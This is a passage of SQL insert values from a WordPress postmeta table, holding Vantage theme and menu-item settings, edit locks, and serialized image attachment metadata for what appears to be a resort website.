er_slider_stretch','1'),(171,44,'vantage_menu_icon',''),(172,44,'_menu_item_type','post_type'),(173,44,'_menu_item_menu_item_parent','0'),(174,44,'_menu_item_object_id','43'),(175,44,'_menu_item_object','page'),(176,44,'_menu_item_target',''),(177,44,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(178,44,'_menu_item_xfn',''),(179,44,'_menu_item_url',''),(180,43,'vantage_metaslider_slider',''),(181,43,'vantage_metaslider_slider_stretch','1'),(182,43,'vantage_menu_icon',''),(183,43,'_edit_lock','1567111851:3'),(184,46,'_edit_last','2'),(185,46,'_wp_page_template','default'),(186,47,'vantage_metaslider_slider',''),(187,47,'vantage_metaslider_slider_stretch','1'),(188,47,'vantage_menu_icon',''),(189,47,'_menu_item_type','post_type'),(190,47,'_menu_item_menu_item_parent','38'),(191,47,'_menu_item_object_id','46'),(192,47,'_menu_item_object','page'),(193,47,'_menu_item_target',''),(194,47,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(195,47,'_menu_item_xfn',''),(196,47,'_menu_item_url',''),(197,46,'vantage_metaslider_slider',''),(198,46,'vantage_metaslider_slider_stretch','1'),(199,46,'vantage_menu_icon',''),(200,46,'_edit_lock','1554781209:2'),(218,52,'_edit_last','2'),(219,52,'_wp_page_template','default'),(220,53,'vantage_metaslider_slider',''),(221,53,'vantage_metaslider_slider_stretch','1'),(222,53,'vantage_menu_icon',''),(223,53,'_menu_item_type','post_type'),(224,53,'_menu_item_menu_item_parent','38'),(225,53,'_menu_item_object_id','52'),(226,53,'_menu_item_object','page'),(227,53,'_menu_item_target',''),(228,53,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(229,53,'_menu_item_xfn',''),(230,53,'_menu_item_url',''),(231,52,'vantage_metaslider_slider',''),(232,52,'vantage_metaslider_slider_stretch','1'),(233,52,'vantage_menu_icon',''),(234,52,'_edit_lock','1567030785:3'),(269,61,'_edit_last','2'),(270,61,'_wp_page_template','default'),(271,62,'vantage_metaslider_slider',''),(272,62,'vantage_metaslider_slider_stretch','1'),(273,62,'vantage_menu_icon',''),(274,62,'_menu_item_type','post_type'),(275,62,'_menu_item_menu_item_parent','41'),(276,62,'_menu_item_object_id','61'),(277,62,'_menu_item_object','page'),(278,62,'_menu_item_target',''),(279,62,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(280,62,'_menu_item_xfn',''),(281,62,'_menu_item_url',''),(282,61,'vantage_metaslider_slider',''),(283,61,'vantage_metaslider_slider_stretch','1'),(284,61,'vantage_menu_icon',''),(285,61,'_edit_lock','1561665402:2'),(286,64,'_edit_last','2'),(287,64,'_wp_page_template','default'),(288,65,'vantage_metaslider_slider',''),(289,65,'vantage_metaslider_slider_stretch','1'),(290,65,'vantage_menu_icon',''),(291,65,'_menu_item_type','post_type'),(292,65,'_menu_item_menu_item_parent','41'),(293,65,'_menu_item_object_id','64'),(294,65,'_menu_item_object','page'),(295,65,'_menu_item_target',''),(296,65,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(297,65,'_menu_item_xfn',''),(298,65,'_menu_item_url',''),(299,64,'vantage_metaslider_slider',''),(300,64,'vantage_metaslider_slider_stretch','1'),(301,64,'vantage_menu_icon',''),(302,64,'_edit_lock','1554854727:1'),(303,68,'_wp_attached_file','2016/03/lodging.png'),(304,68,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:589;s:6:\"height\";i:546;s:4:\"file\";s:19:\"2016/03/lodging.png\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"lodging-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"lodging-300x278.png\";s:5:\"width\";i:300;s:6:\"height\";i:278;s:9:\"mime-type\";s:9:\"image/png\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:19:\"lodging-330x174.png\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:19:\"lodging-330x116.png\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"lodging-589x380.png\";s:5:\"width\";i:589;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:19:\"lodging-589x380.png\";s:5:\"width\";i:589;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:19:\"lodging-589x480.png\";s:5:\"width\";i:589;s:6:\"height\";i:480;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:19:\"lodging-272x182.png\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:19:\"lodging-436x272.png\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(305,70,'_wp_attached_file','2016/03/AshbyResortMap.jpg'),(306,70,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:909;s:6:\"height\";i:702;s:4:\"file\";s:26:\"2016/03/AshbyResortMap.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"AshbyResortMap-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"AshbyResortMap-300x232.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:232;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"AshbyResortMap-768x593.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:593;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:26:\"AshbyResortMap-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:26:\"AshbyResortMap-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:26:\"AshbyResortMap-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:26:\"AshbyResortMap-909x380.jpg\";s:5:\"width\";i:909;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:26:\"AshbyResortMap-909x480.jpg\";s:5:\"width\";i:909;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:26:\"AshbyResortMap-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:26:\"AshbyResortMap-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(307,72,'_wp_attached_file','2016/03/04c_04.jpg'),(308,72,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:626;s:6:\"height\";i:682;s:4:\"file\";s:18:\"2016/03/04c_04.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"04c_04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"04c_04-275x300.jpg\";s:5:\"width\";i:275;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:18:\"04c_04-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:18:\"04c_04-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"04c_04-626x380.jpg\";s:5:\"width\";i:626;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:18:\"04c_04-626x380.jpg\";s:5:\"width\";i:626;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:18:\"04c_04-626x480.jpg\";s:5:\"width\";i:626;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:18:\"04c_04-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:18:\"04c_04-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(309,74,'_wp_attached_file','2016/03/04a_04.jpg'),(310,74,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:626;s:6:\"height\";i:682;s:4:\"file\";s:18:\"2016/03/04a_04.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"04a_04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"04a_04-275x300.jpg\";s:5:\"width\";i:275;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:18:\"04a_04-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:18:\"04a_04-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"04a_04-626x380.jpg\";s:5:\"width\";i:626;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:18:\"04a_04-626x380.jpg\";s:5:\"width\";i:626;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:18:\"04a_04-626x480.jpg\";s:5:\"width\";i:626;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:18:\"04a_04-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:18:\"04a_04-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(311,76,'_wp_attached_file','2016/03/04b_04.jpg'),(312,76,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:626;s:6:\"height\";i:682;s:4:\"file\";s:18:\"2016/03/04b_04.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"04b_04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"04b_04-275x300.jpg\";s:5:\"width\";i:275;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:18:\"04b_04-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:18:\"04b_04-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"04b_04-626x380.jpg\";s:5:\"width\";i:626;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:18:\"04b_04-626x380.jpg\";s:5:\"width\";i:626;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:18:\"04b_04-626x480.jpg\";s:5:\"width\";i:626;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:18:\"04b_04-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:18:\"04b_04-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(313,78,'_wp_attached_file','2016/03/04d_04.jpg'),(314,78,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:626;s:6:\"height\";i:682;s:4:\"file\";s:18:\"2016/03/04d_04.jpg\";s:5:\"sizes\";a:9:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"04d_04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"04d_04-275x300.jpg\";s:5:\"width\";i:275;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:18:\"04d_04-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:18:\"04d_04-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:18:\"04d_04-626x380.jpg\";s:5:\"width\";i:626;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:18:\"04d_04-626x380.jpg\";s:5:\"width\";i:626;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:18:\"04d_04-626x480.jpg\";s:5:\"width\";i:626;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:18:\"04d_04-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:18:\"04d_04-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(315,81,'_edit_last','1'),(316,81,'_wp_page_template','default'),(317,82,'vantage_metaslider_slider',''),(318,82,'vantage_metaslider_slider_stretch','1'),(319,82,'vantage_menu_icon',''),(320,82,'_menu_item_type','post_type'),(321,82,'_menu_item_menu_item_parent','41'),(322,82,'_menu_item_object_id','81'),(323,82,'_menu_item_object','page'),(324,82,'_menu_item_target',''),(325,82,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(326,82,'_menu_item_xfn',''),(327,82,'_menu_item_url',''),(328,81,'vantage_metaslider_slider',''),(329,81,'vantage_metaslider_slider_stretch','1'),(330,81,'vantage_menu_icon',''),(331,81,'_edit_lock','1568130204:3'),(332,84,'_edit_last','1'),(333,84,'_wp_page_template','default'),(334,85,'vantage_metaslider_slider',''),(335,85,'vantage_metaslider_slider_stretch','1'),(336,85,'vantage_menu_icon',''),(337,85,'_menu_item_type','post_type'),(338,85,'_menu_item_menu_item_parent','41'),(339,85,'_menu_item_object_id','84'),(340,85,'_menu_item_object','page'),(341,85,'_menu_item_target',''),(342,85,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(343,85,'_menu_item_xfn',''),(344,85,'_menu_item_url',''),(345,84,'vantage_metaslider_slider',''),(346,84,'vantage_metaslider_slider_stretch','1'),(347,84,'vantage_menu_icon',''),(348,84,'_edit_lock','1554944359:1'),(349,88,'_edit_last','1'),(350,88,'_edit_lock','1592229272:3'),(351,88,'_wp_page_template','default'),(352,89,'vantage_metaslider_slider',''),(353,89,'vantage_metaslider_slider_stretch','1'),(354,89,'vantage_menu_icon',''),(355,89,'_menu_item_type','post_type'),(356,89,'_menu_item_menu_item_parent','44'),(357,89,'_menu_item_object_id','88'),(358,89,'_menu_item_object','page'),(359,89,'_menu_item_target',''),(360,89,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(361,89,'_menu_item_xfn',''),(362,89,'_menu_item_url',''),(363,88,'vantage_metaslider_slider',''),(364,88,'vantage_metaslider_slider_stretch','1'),(365,88,'vantage_menu_icon',''),(366,92,'_edit_last','1'),(367,92,'_wp_page_template','default'),(368,93,'vantage_metaslider_slider',''),(369,93,'vantage_metaslider_slider_stretch','1'),(370,93,'vantage_menu_icon',''),(371,93,'_menu_item_type','post_type'),(372,93,'_menu_item_menu_item_parent','0'),(373,93,'_menu_item_object_id','92'),(374,93,'_menu_item_object','page'),(375,93,'_menu_item_target',''),(376,93,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(377,93,'_menu_item_xfn',''),(378,93,'_menu_item_url',''),(379,92,'vantage_metaslider_slider',''),(380,92,'vantage_metaslider_slider_stretch','1'),(381,92,'vantage_menu_icon',''),(382,92,'_edit_lock','1560542790:1'),(383,105,'_wp_attached_file','2016/03/2008-088.jpg'),(384,105,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;s:4:\"file\";s:20:\"2016/03/2008-088.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"2008-088-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"2008-088-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"2008-088-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"2008-088-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"2008-088-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"2008-088-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"2008-088-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"2008-088-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"2008-088-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"2008-088-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"2008-088-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1211120966\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"6\";s:3:\"iso\";s:3:\"125\";s:13:\"shutter_speed\";s:5:\"0.025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(385,107,'_edit_last','2'),(386,107,'_wp_page_template','default'),(387,108,'vantage_metaslider_slider',''),(388,108,'vantage_metaslider_slider_stretch','1'),(389,108,'vantage_menu_icon',''),(390,108,'_menu_item_type','post_type'),(391,108,'_menu_item_menu_item_parent','41'),(392,108,'_menu_item_object_id','107'),(393,108,'_menu_item_object','page'),(394,108,'_menu_item_target',''),(395,108,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(396,108,'_menu_item_xfn',''),(397,108,'_menu_item_url',''),(398,107,'vantage_metaslider_slider',''),(399,107,'vantage_metaslider_slider_stretch','1'),(400,107,'vantage_menu_icon',''),(401,107,'_edit_lock','1554945653:1'),(402,110,'_wp_attached_file','2016/03/Carly-152.jpg'),(403,110,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;s:4:\"file\";s:21:\"2016/03/Carly-152.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"Carly-152-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Carly-152-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"Carly-152-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"Carly-152-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:21:\"Carly-152-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:21:\"Carly-152-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:21:\"Carly-152-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:22:\"Carly-152-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:21:\"Carly-152-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:21:\"Carly-152-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:21:\"Carly-152-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"DSC-H2\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1185205822\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"13.1\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:5:\"0.001\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(404,112,'_wp_attached_file','2016/03/DSC00168.jpg'),(405,112,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1632;s:6:\"height\";i:1224;s:4:\"file\";s:20:\"2016/03/DSC00168.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSC00168-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSC00168-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSC00168-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSC00168-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4: